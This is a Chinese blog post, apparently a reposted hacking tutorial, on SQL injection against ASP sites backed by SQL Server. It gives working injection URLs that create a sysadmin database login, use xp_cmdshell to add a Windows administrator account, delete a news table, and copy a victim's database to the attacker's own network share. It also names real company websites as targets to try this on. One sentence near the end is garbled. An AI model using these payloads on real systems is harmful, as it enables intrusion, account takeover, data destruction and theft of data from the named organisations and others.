最近才发现我的程序里有如此多的漏洞

最新推荐文章于 2021-05-27 20:01:14 发布
最新推荐文章于 2021-05-27 20:01:14 发布
阅读量443 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014440119/article/details/26207847
版权

程的书上,源代码例子就有这个漏洞存在,其实只是一些合法的ASP对SQL的请求,就留下后患无穷!

这种攻击方法最早源于''or''1''=''1的漏洞(我们暂且称其为漏洞),这个漏洞的原理我想大家因该都知道了,那么随之而来的便是;exec

sp_addlogin hax(在数据库内添加一个hax用户),但是这个方法的限制很大,首先ASP使用的SQL Server账号是个管理员,其次请求的提交变

量在整个SQL语句的最后,因为有一些程序员采用SELECT * FROM news WHERE id=... AND topic=... AND .....

这种方法请求数据库,那么如果还用以上的例子就会

news.asp?id=2;exec sp_addlogin hax

变成SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic=... AND ...

整个SQL语句在执行sp_addlogin的存储过程后有AND与判断存在,语法错误,你的sp_addlogin自然也不能正常运行了,因此试试看下面这个方法

news.asp?id=2;exec sp_addlogin hax;--

后面的--符号把sp_addlogin后的判断语句变成了注释,这样就不会有语法错误了,sp_addlogin正常执行!

那么我们连一起来用吧

news.asp?id=2;exec master.dbo.sp_addlogin hax;--

news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--

news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--

news.asp?id=2;exec master.dbo.xp_cmdshell ''net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes/active:yes /add'';-- 
news.asp?id=2;exec master.dbo.xp_cmdshell ''net localgroup administrators hax /add'';--

这样,你在他的数据库和系统内都留下了hax管理员账号了

当然,前提条件是ASP用管理员账号,所以虚拟空间大家就别试了,不会存在这个漏洞的。

以后我们会讨论,如果对方的ASP不是用SQL管理员账号,我们如何入侵,当然也会涉及到1433端口的入侵

当然大家可以试试看在id=2后面加上一个''符号,主要看对方的ASP怎么写了,再说说当ASP程序使用的SQL账号不是管理员的时候我们该如何做。

你如天融信的主页,有新闻内容,如下:

http://www.talentit.com.cn/news/news-2.asp?newid=117

大家可以试试看http://www.talentit.com.cn/news/news-2.asp?newid=117;select 123;--

呵呵,报语法错误,select 123错误,显而易见,天融新的ASP在newid变量后面用''号结束

那么试试看http://www.talentit.com.cn/news/news-2.asp?newid=117'';delete news;--

哈哈,我想只要表名猜对了,新闻库就被删了

通常ASP用的SQL账号就算不是管理员也会是某个数据库的owner,至少对于这个库有很高的管理权限

但是我们不知道库名该怎么?看看db_name()函数吧

打开你的query analyzer,看看print db_name() ,呵呵,当前的数据库名就出来了

以次类推,如下: declare @a sysname;set @a=db_name();backup database @a to disk=''你的IP你的共享目录bak.dat'' ,name=''test'';--

呵呵,他的当前数据库就备份到你的硬盘上了,接下来要做的大家心里都明白了吧

同理这个方法可以找到对方的SQL的IP

先装一个防火墙,打开ICMP和139TCP和445TCP的警告提示

然后试试看news.asp?id=2;exec master.dbo.xp_cmdshell ''ping 你的IP''

如果防火墙提示有人ping你,那么因该可以肯定对方的ASP用的是SQL的管理员权限,同时也确定了对方的SQL Server的准确位置,因为很多大 一点的网站考虑性能,会吧web服务和数据库分开,当对方大上了补丁看不到源代码时,我想只有这个方法能很快的定位对方的SQL Server的位置了

那么,如果对方ASP没有SQL管理员权限,我们就不能调用xp_cmdshell了,该怎么办?

别着急,试试看这个news.asp?id=2;declare @a;set @a=db_name();backup database @a to disk=''你的IP你的共享目录bak.dat''

,name=''test'';--

呵呵,你的防火墙该发出警告了,有人连接你的445或139(win9端口了,这样,对方的SQL的ip一样也可以暴露 那么如果对方连某个数据库的owner也不是的话,我们该怎么办?下次我会告诉大幸陨蟯rl希望大家通过vbscript提交,因为浏览器的地址栏会屏蔽一些特殊字符,这样你的命令就不能完整传输了

window.location.herf=URL

补充:这个问题以前载网上也提出来过,但是只是一些简单的xp_cmdshell调用限制很大,其实这里面还有很多值得深入的地方比如 www.guosen.com.cn。国信证卷就有这个问题,而且他们采用ms的三层结构作的用以前说的xp_cmdshell做法就不行了,字符串会被过滤,但是 我尝试了,用sql的异类请求仍然可以在对方的机器上开启telnet服务和admi。 

xergnvij
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞代码的几个例子
12-06
关于常见代码漏洞的一些分析,还有几个小例子
程序员们,快来找漏洞啊!找到就赏15ETH
区块链大本营
10-17 7664
还记得这张图吗?得到 300BTC 了吗? 在上周,区块链游戏比特币挑战(Bitcoin Challenge)风靡全网。游戏非常简单,就只有一张图,在这张图中藏着 310.61 个比特币,换算成人民币价值 1400 万元,只要你能看出来,这笔巨款就归你了。 不知道聪明的你能否“看出”这笔巨款,反正营长看了半天也没看出个所以然来。如果说这个悬赏太抽象。 ...
openswan中ISAKMP交互过程关键函数接口
遇见你是我最美丽的意外
05-18 5010
1. ISAKMP交互过程中关键函数接口 下面分别说明不同的阶段和模式下的函数接口以及对应的报文。 2. 第一阶段(Phase I)主模式函数接口 发送端响应端main_outI1主模式第一包main_inI1_outR1主模式第二包main_inR1_outI2主模式第三包main_inI2_outR2主模式第四包main_inR2_outI3主模式第五包main_inI3_outR3主模式第六包main_inR3发送端响应端 3. 第一阶段(Phase I)野蛮模式函数接口 发送端响应端aggr_ou
IPSec中pluto框架和函数接口
03-29
该文档主要用来介绍IPsec是模块中pluto的框架、基本原理简介、函数调用关系、主要函数接口说明。例如包含:主模式和野蛮模式报文交互流程和函数接口、IKE协商、内核函数接口等
提高Ajax应用程序性能,避开Web服务漏洞
02-03
火龙果软件工程技术中心 本文内容包括:...developerWorks定期撰稿人JudithMyerson对Ajax进行了简单的概述,解释了Web服务漏洞是什么以及为何ServiceLevelAgreements(SLA)如此重要,并提出了一些改进Ajax应用程序
为何自动化漏洞挖掘如此困难.pdf
08-08
现有的自动化漏洞挖掘技术多种多样,但这些技术都有一定的不足,主要体现在以下三个方面:分析速度慢、程序状态空间覆盖率低、自动化程度差。这些不足之处影响了自动化漏洞挖掘技术在现实中的广泛应用。因此,漏洞...
安全知识竞赛题小程序漏洞.docx
最新发布
12-17
尽管如此,安全知识竞赛题小程序仍可能存在一些潜在的漏洞。例如,开发者可能在编写代码时忽视了某些安全细节,如输入验证不足,可能导致跨站脚本攻击(XSS)或SQL注入;或者在处理用户数据时,未正确加密,使得敏感...
上下文感知的安卓应用程序漏洞检测研究.docx
05-29
### 上下文感知的安卓应用程序漏洞检测研究 #### 引言与背景 随着智能手机和移动互联网的普及,安卓操作系统已成为全球范围内最受欢迎的移动操作系统之一。然而,随着安卓应用的不断增多,应用程序中存在的安全...
RHEL5.4 iptables 配置详解(图)
然若风散记
09-20 1073
本节中将重点 介绍下iptables的配置,这可是保证网络安全的利器,iptables是基于内核的防火墙,内置了filter,nat和mangle三张 表,filter负责过滤数据包,nat则涉及到网络地址转换;mangle表则主要应用在修改数据包内容上,一般很少使用它;默认的规则链 有:INPUT,OUTPUT,NAT,POSTROUTING,PREROUTING;下面的两张图片很好的说明了
IPSec NAT穿越静态配置和问题
redwingz的博客
05-22 2868
网络拓扑 |-------------------| |-------------------| | | | | | 192.168.1.115 | <---------> | 192.168.1.142 | | ...
软件漏洞分析入门
热门推荐
whatday的专栏
09-23 1万+
1 引子 To be the apostrophe which changed “Impossible” into “I’m possible” —— failwest 凉风有讯,秋月无边。 您是否梦想过能够像电影上演的那样黑进任意一台机器远程操控?您的梦想是否曾经被书店边满架子的反黑,防毒,擒木马的扫盲书强暴的体无完肤? 从今天开始,准备陆续发一系列关于软件漏洞方面基础知识的帖子,包括软件漏洞...
资深程序员之路(1)--如何保证代码是没安全漏洞
Eshine的博客
09-18 5318
一个偶然的机会需要竞标一个大项目,需要参加甲方的资深架构师面试,事先有一点准备,如何保证代码是没安全漏洞的,如何保证代码是clean的,要了解设计模式,能画出一个UML class图,如何做持续集成和部署,agile开发 上面的这些对于大多数程序员可能完全涉及不到,这些更多是概念和习惯层面的,可以区分优质的程序还是入门的。还了解到面试官是个外国人需要英语面试,压力更大一些。当然这些并不包含资深程序
程序员必备基础:10种常见安全漏洞浅析
Java知音
05-10 906
前言我们日常开发中,很多小伙伴容易忽视安全漏洞问题,认为只要正常实现业务逻辑就可以了。其实,安全性才是最重要的。本文将跟大家一起学习常见的安全漏洞问题,希望对大家有帮助哈。如果本文有什么错...
程序员都需要懂的10种常见安全漏洞
lixinkuan的博客
05-27 4307
1. SQL 注入 1.1 什么是SQL注入? 1.2 SQL注入是如何攻击的? 1.3 如何预防SQL注入问题 2. JSON反序列化漏洞——如Fastjson安全漏洞 2.1 什么是JSON序列化,JSON发序列化 2.2 JSON 反序列化漏洞是如何被攻击? 3. XSS 攻击 3.1 什么是XSS? 3.2 XSS是如何攻击的? 3.3 如何解决XSS攻击问题 4. CSRF 攻击 4.1 什么是CSRF 攻击? 4.2 ...
深入解析ASP SQL注入漏洞
SQL注入是一种严重的安全威胁,对ASP应用程序尤其如此,因为许多ASP站点使用Access或SQL Server数据库,这些数据库引擎都曾出现过可被利用的安全问题。理解SQL注入的原理和防范措施,对于开发者和安全专家来说都是至...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值